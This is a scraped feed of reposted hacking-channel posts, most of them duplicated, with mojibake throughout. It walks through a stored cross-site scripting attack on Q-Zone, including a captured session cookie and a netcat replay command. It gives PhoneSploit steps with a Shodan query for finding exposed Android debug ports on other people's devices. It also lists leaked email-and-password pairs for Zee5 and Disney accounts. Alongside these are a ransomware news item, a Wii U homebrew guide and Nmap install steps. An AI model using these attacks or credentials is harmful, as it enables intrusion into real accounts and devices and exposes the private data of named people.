Forwarded from PRIVATE UNDERCODE
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode
1_ -Zone filters user input
After entering the Q-Zone, click "Settings β Space Settings βq Space Name" in turn, where the display name of the space can be modified. If we write an executable script code, as long as the filtering is not strict, it will also be saved in the home page, and the execution code is called to attack the browser. Let's first test whether we can write cross-site scripts in this input box:
2) When entering the above code "<script> alert (" test ") </ script>" in the "Input Space Name" input box, I found that the length of the input characters was limited in the input box, and only 24 characters could be entered in total. And when we enter the code of the permitted length, after clicking Submit, a dialog box of "Please do not include" <> etc. characters in the input "will pop up. It seems that Q-Zone filters the user's input.
3) Check the input filtering method of Q-Zone
Click "View β Source File" on the Q-Zone page. At the beginning of the code segment, you can see the following code segment:
if (! checkFormValue (form1)) return false;
len = StrLenOfAscii (form1.spacename.value) / 2;
if (len> 12) {
4) Users with a little ASP programming foundation, I believe they can understand this code? Through the "StrLenOfAscii ()" function in the code, the length of the user input data ASC β ‘ code is obtained, and the value is assigned to the len variable after dividing by 2. If the following code detects that the length of the len variable is greater than 12, it prompts that the name is too long. The most important one is the previous sentence: "if (! CheckFormValue (form1)) return false", where the "checkFormValue ()" function can obviously be inferred to detect whether the input data contains special characters. When it is detected that the data contains filtered characters, the aforementioned dialog box pops up.
5) Through analysis, we can be sure that Q-Zone filters the user input data on the client side.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode
1_ -Zone filters user input
After entering the Q-Zone, click "Settings β Space Settings βq Space Name" in turn, where the display name of the space can be modified. If we write an executable script code, as long as the filtering is not strict, it will also be saved in the home page, and the execution code is called to attack the browser. Let's first test whether we can write cross-site scripts in this input box:
2) When entering the above code "<script> alert (" test ") </ script>" in the "Input Space Name" input box, I found that the length of the input characters was limited in the input box, and only 24 characters could be entered in total. And when we enter the code of the permitted length, after clicking Submit, a dialog box of "Please do not include" <> etc. characters in the input "will pop up. It seems that Q-Zone filters the user's input.
3) Check the input filtering method of Q-Zone
Click "View β Source File" on the Q-Zone page. At the beginning of the code segment, you can see the following code segment:
if (! checkFormValue (form1)) return false;
len = StrLenOfAscii (form1.spacename.value) / 2;
if (len> 12) {
4) Users with a little ASP programming foundation, I believe they can understand this code? Through the "StrLenOfAscii ()" function in the code, the length of the user input data ASC β ‘ code is obtained, and the value is assigned to the len variable after dividing by 2. If the following code detects that the length of the len variable is greater than 12, it prompts that the name is too long. The most important one is the previous sentence: "if (! CheckFormValue (form1)) return false", where the "checkFormValue ()" function can obviously be inferred to detect whether the input data contains special characters. When it is detected that the data contains filtered characters, the aforementioned dialog box pops up.
5) Through analysis, we can be sure that Q-Zone filters the user input data on the client side.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
YouTube
UNDERCODE
FREE AI & CYBERSECURITY TRICKS & MALWARE ANALYSIS HACKS, DAILY MEMES & MINDβBENDING TECH MYSTERIESβ¦ ALL ON UNDERCODE!
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Exploitation of Q-Zone cross-site vulnerability :
t.me/UndercodeTesting
1) Now that Q-Zone filters the user input data on the client, it leaves us with an opportunity to use. We can bypass the limitations of the client and directly modify the input data for submission. But Q-Zone imposes another restriction on the data submitted by users, that is, it is not allowed to submit from external sites, and the HTML files we save here cannot submit data normally. Therefore, we must think of another way to modify the submitted data.
2) We first run a software called WSockExpert. After running WSockExpert, click the "Open" button on the toolbar to display the current process list. If you open the Q-Zone with the QQ panel, then select "QQ.exe β ** 's home" in the process list; if you open the Q-Zone with IE, you can find the corresponding process in the IE process and confirm Then click the "Open" button to start monitoring the data exchanged with the website server.
3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890" at the "space name", and then click "Submit" to return to the WSockExpert, click on the third row near the "send" Data column, you can see the content of the submitted data:
4) "Content-Length: 20
Cookie: pvid = 1575119174; portalentryurl = http: //vnet.qq.com/hn/; zzpaneluin = 41346583; zzpanelkey ββ= 753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver = 1305; skey =; uin = g
spacename = 1234567890 "
"Cookie" is the content of the cookie, which contains the user authentication; and "spacename = 1234567890" is the space name data we submitted; the previous "Content-Length: 20" is the length of the submitted data. In the data, you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we want to submit.
3) Modify the submitted data
After copying all the submitted data in the following window, save it as a 1.TXT file, and change "spacename = 1234567890" in the code to: "spacename = <script> alert (" test ") </ script>", "Content-Length: 20" changed to "Content-Length: 40"
4) Now as long as we submit these data to the server, we can bypass the client's data filtering, which requires another tool called NC.
Copy the "1.txt" saved above to the same folder as "nc.exe", open the command prompt window in the Windows system, enter the folder where NC.exe is located at the command line, enter "nc- vv q-zone.qq.com 80 <1.txt ", after the command is executed, we will submit our modified data to the remote server.
> We can change "Test" to any Chinese, but we need to convert it to IE code first. For example, the IE code for "Test" is "% B2% E2% CA% D4". .
5) Examine the results of code execution
Open our Q-Zone, and a prompt window will pop up automatically. It means that we have successfully inserted the "<script> alert (" test ") </ script>" code in the remote webpage! At the same time, on the page for modifying the space name, you can see the originally restricted space name that has been submitted for modification.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Exploitation of Q-Zone cross-site vulnerability :
t.me/UndercodeTesting
1) Now that Q-Zone filters the user input data on the client, it leaves us with an opportunity to use. We can bypass the limitations of the client and directly modify the input data for submission. But Q-Zone imposes another restriction on the data submitted by users, that is, it is not allowed to submit from external sites, and the HTML files we save here cannot submit data normally. Therefore, we must think of another way to modify the submitted data.
2) We first run a software called WSockExpert. After running WSockExpert, click the "Open" button on the toolbar to display the current process list. If you open the Q-Zone with the QQ panel, then select "QQ.exe β ** 's home" in the process list; if you open the Q-Zone with IE, you can find the corresponding process in the IE process and confirm Then click the "Open" button to start monitoring the data exchanged with the website server.
3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890" at the "space name", and then click "Submit" to return to the WSockExpert, click on the third row near the "send" Data column, you can see the content of the submitted data:
4) "Content-Length: 20
Cookie: pvid = 1575119174; portalentryurl = http: //vnet.qq.com/hn/; zzpaneluin = 41346583; zzpanelkey ββ= 753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver = 1305; skey =; uin = g
spacename = 1234567890 "
"Cookie" is the content of the cookie, which contains the user authentication; and "spacename = 1234567890" is the space name data we submitted; the previous "Content-Length: 20" is the length of the submitted data. In the data, you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we want to submit.
3) Modify the submitted data
After copying all the submitted data in the following window, save it as a 1.TXT file, and change "spacename = 1234567890" in the code to: "spacename = <script> alert (" test ") </ script>", "Content-Length: 20" changed to "Content-Length: 40"
4) Now as long as we submit these data to the server, we can bypass the client's data filtering, which requires another tool called NC.
Copy the "1.txt" saved above to the same folder as "nc.exe", open the command prompt window in the Windows system, enter the folder where NC.exe is located at the command line, enter "nc- vv q-zone.qq.com 80 <1.txt ", after the command is executed, we will submit our modified data to the remote server.
> We can change "Test" to any Chinese, but we need to convert it to IE code first. For example, the IE code for "Test" is "% B2% E2% CA% D4". .
5) Examine the results of code execution
Open our Q-Zone, and a prompt window will pop up automatically. It means that we have successfully inserted the "<script> alert (" test ") </ script>" code in the remote webpage! At the same time, on the page for modifying the space name, you can see the originally restricted space name that has been submitted for modification.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦EXPLOIT
> updated - Using open Adb ports we can exploit a device
termux(root)-linuxβ
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/Zucccs/PhoneSploit
2) extract adb.rar to the phonesploit directory
3) cd PhoneSploit
4) pip install colorama
5) python2 main.py
6) IF ADB NOT FOUND
sudo apt update sudo apt install android-tools-adb android-tools-fastboot
7) Using open Adb ports we can exploit a device
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3AβAndroid+Debug+Bridgeβ
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦EXPLOIT
> updated - Using open Adb ports we can exploit a device
termux(root)-linuxβ
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/Zucccs/PhoneSploit
2) extract adb.rar to the phonesploit directory
3) cd PhoneSploit
4) pip install colorama
5) python2 main.py
6) IF ADB NOT FOUND
sudo apt update sudo apt install android-tools-adb android-tools-fastboot
7) Using open Adb ports we can exploit a device
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3AβAndroid+Debug+Bridgeβ
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Ransomware attacks the largest U.S. ATM supplier-NEWS
1) Diebold Nixdorf, the largest ATM supplier in the United States, was attacked by ransomware .
2) The company stated that hackers failed to access ATMs or customer networks and only affected their corporate networks. Diebold has 35,000 employees and its ATM machine has an estimated global market share of 35%. It also produces point-of-sale systems and software used by retailers.
3) The attack occurred on the evening of April 25. The security team detected abnormal behavior on the corporate network, and it immediately took action to isolate the system in the network and prevent the spread of malicious programs. The company said the ransomware did not affect its customer network. What hacked into Diebold's corporate network was ransomware called ProLock. Diebold said it did not pay the ransom to the attackers. Security experts say it may be better to do so, because the current version of ProLock decryption tools can damage large files such as databases.
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Ransomware attacks the largest U.S. ATM supplier-NEWS
1) Diebold Nixdorf, the largest ATM supplier in the United States, was attacked by ransomware .
2) The company stated that hackers failed to access ATMs or customer networks and only affected their corporate networks. Diebold has 35,000 employees and its ATM machine has an estimated global market share of 35%. It also produces point-of-sale systems and software used by retailers.
3) The attack occurred on the evening of April 25. The security team detected abnormal behavior on the corporate network, and it immediately took action to isolate the system in the network and prevent the spread of malicious programs. The company said the ransomware did not affect its customer network. What hacked into Diebold's corporate network was ransomware called ProLock. Diebold said it did not pay the ransom to the attackers. Security experts say it may be better to do so, because the current version of ProLock decryption tools can damage large files such as databases.
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Zee5 Accounts
abbasmanas@gmail.com:zahra786
aavanthireddy@gmail.com:rskr@avn2011
abhi.basant26@gmail.com:abybaby26
abbasmanas@gmail.com:zahra786
aavanthireddy@gmail.com:rskr@avn2011
abhi.basant26@gmail.com:abybaby26
π¦ Disney Accounts
megkatherine@yahoo.com:arzadhare1
dasilvacassandra25@gmail.com:sdsdc2d
megkatherine@yahoo.com:arzadhare1
dasilvacassandra25@gmail.com:sdsdc2d
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Block Wii U System Updates (Without DNS Blocking!)
π¦Requirements:
> A Wii U & SD: Firmware and SD size doesn't matter as long as you satisfy the other conditions
Mocha Or Haxchi
> HBL on SD card
>ftpiiu_everywhere (Haxchi) on SD card
>Access to HBL: Browserhax, Haxchi/CBHC, or any other form of entry point, are all fine. As long as you access it.
>A PC with FTP Client: Technically it doesn't have to be a PC. It can even be done on your phone with an FTP Client. I'm using the PC for the simplicity of it. FileZilla IS RECOMMENDED.
Optional: Use Nand Dumper to back up your nand with all it's contents, as well as dumping the OTP and SEEPRPOM. By having those, you can unbrick your system with a hardmod at any point. Dumping MLC will require a 64GB SD card if your Wii U is 32GB, or 16GB SD card if your Wii U is 8GB.
A1) Using Haxchi/CBHC:
System Menu: Have Haxchi reboot to System menu.
System Menu: Launch HBL via Haxchi or browser.
HBL: Launch ftpiiu_everywhere.
2) Proceed to section of the guide to block updates. Proceed to section
"3)" if you want to unblock them again.
B) Using Mocha:
1) System Menu: Launch HBL via browser.
2) HBL: Start Mocha (Using default values are fine)
3) System Menu: Launch HBL via browser again.
4) HBL: Launch ftpiiu_everywhere.
5) Proceed to section "
6) Modifying your Nand, and blocking updates:
7) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.
8) PC: Once connected, Navigate to: "storage_mlc/sys/"
9) PC: Locate "update" folder, right-click it and Pick "File Permissions". Make sure it's the same as the screenshot below. If it's not the same, then make note of that. You will need it if you want to enable updates later. If it's the Same, then proceed to the next Step.
π¦Block Wii U System Updates (Without DNS Blocking!)
π¦Requirements:
> A Wii U & SD: Firmware and SD size doesn't matter as long as you satisfy the other conditions
Mocha Or Haxchi
> HBL on SD card
>ftpiiu_everywhere (Haxchi) on SD card
>Access to HBL: Browserhax, Haxchi/CBHC, or any other form of entry point, are all fine. As long as you access it.
>A PC with FTP Client: Technically it doesn't have to be a PC. It can even be done on your phone with an FTP Client. I'm using the PC for the simplicity of it. FileZilla IS RECOMMENDED.
Optional: Use Nand Dumper to back up your nand with all it's contents, as well as dumping the OTP and SEEPRPOM. By having those, you can unbrick your system with a hardmod at any point. Dumping MLC will require a 64GB SD card if your Wii U is 32GB, or 16GB SD card if your Wii U is 8GB.
A1) Using Haxchi/CBHC:
System Menu: Have Haxchi reboot to System menu.
System Menu: Launch HBL via Haxchi or browser.
HBL: Launch ftpiiu_everywhere.
2) Proceed to section of the guide to block updates. Proceed to section
"3)" if you want to unblock them again.
B) Using Mocha:
1) System Menu: Launch HBL via browser.
2) HBL: Start Mocha (Using default values are fine)
3) System Menu: Launch HBL via browser again.
4) HBL: Launch ftpiiu_everywhere.
5) Proceed to section "
6) Modifying your Nand, and blocking updates:
7) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.
8) PC: Once connected, Navigate to: "storage_mlc/sys/"
9) PC: Locate "update" folder, right-click it and Pick "File Permissions". Make sure it's the same as the screenshot below. If it's not the same, then make note of that. You will need it if you want to enable updates later. If it's the Same, then proceed to the next Step.
now :
1) PC: Delete βupdateβ folder.
2) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.
3) Wii U: Exit Mii Maker, and click on system settings.
4) System Settings: Attempt to update your Wii U as Normal. A few seconds after it starts and the progress bar appears, it should give out this error code: 105-3012. If the progress bar actually continues to move, TURN OFF THE WII U IMMEDIATELY!! Recheck your steps, cause something went wrong.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
1) PC: Delete βupdateβ folder.
2) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.
3) Wii U: Exit Mii Maker, and click on system settings.
4) System Settings: Attempt to update your Wii U as Normal. A few seconds after it starts and the progress bar appears, it should give out this error code: 105-3012. If the progress bar actually continues to move, TURN OFF THE WII U IMMEDIATELY!! Recheck your steps, cause something went wrong.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Unblocking updates of WiU:
If for whatever reason, you would like to return the Wii U to it's original updating state, start by following "1A)" or "1B)" of the guide, then proceed to the next step of this section:
1) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.
2) PC: Once connected, Navigate to: "storage_mlc/sys/"
3) PC: Right-click, and select "Create Directory". Create βupdateβ folder. Once created, right-
4) click again, and select "File Permissions".
5) PC: When you originally did section > , if your permissions were the same as the screenshot in that section, enter those same permissions here. If not, then you should have noted them down somewhere. Enter those values instead, then click ok.
6) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.
7) Wii U: Exit Mii Maker, and click on system settings.
8) System Settings: Attempt to update your Wii U as Normal. It should proceed to update normally.
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Unblocking updates of WiU:
If for whatever reason, you would like to return the Wii U to it's original updating state, start by following "1A)" or "1B)" of the guide, then proceed to the next step of this section:
1) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.
2) PC: Once connected, Navigate to: "storage_mlc/sys/"
3) PC: Right-click, and select "Create Directory". Create βupdateβ folder. Once created, right-
4) click again, and select "File Permissions".
5) PC: When you originally did section > , if your permissions were the same as the screenshot in that section, enter those same permissions here. If not, then you should have noted them down somewhere. Enter those values instead, then click ok.
6) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.
7) Wii U: Exit Mii Maker, and click on system settings.
8) System Settings: Attempt to update your Wii U as Normal. It should proceed to update normally.
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to install Nmap in Termux
You can install Nmap in Termux just by typing a few commands
If you have already installed Termux from play store then open Termux and type below command
1) termux-setup-storage
You will be asked to give permission to Termux for storage access
After that type below command
2) apt update && apt upgrade
After that you will be asked to update packages to newer packages, so simply type y for yes and hit enter
3) To install Nmap you have to type below command
pkg install nmap
That's all you have successfully installed nmap in Termux
You can install Nmap in Termux just by typing a few commands
If you have already installed Termux from play store then open Termux and type below command
1) termux-setup-storage
You will be asked to give permission to Termux for storage access
After that type below command
2) apt update && apt upgrade
After that you will be asked to update packages to newer packages, so simply type y for yes and hit enter
3) To install Nmap you have to type below command
pkg install nmap
That's all you have successfully installed nmap in Termux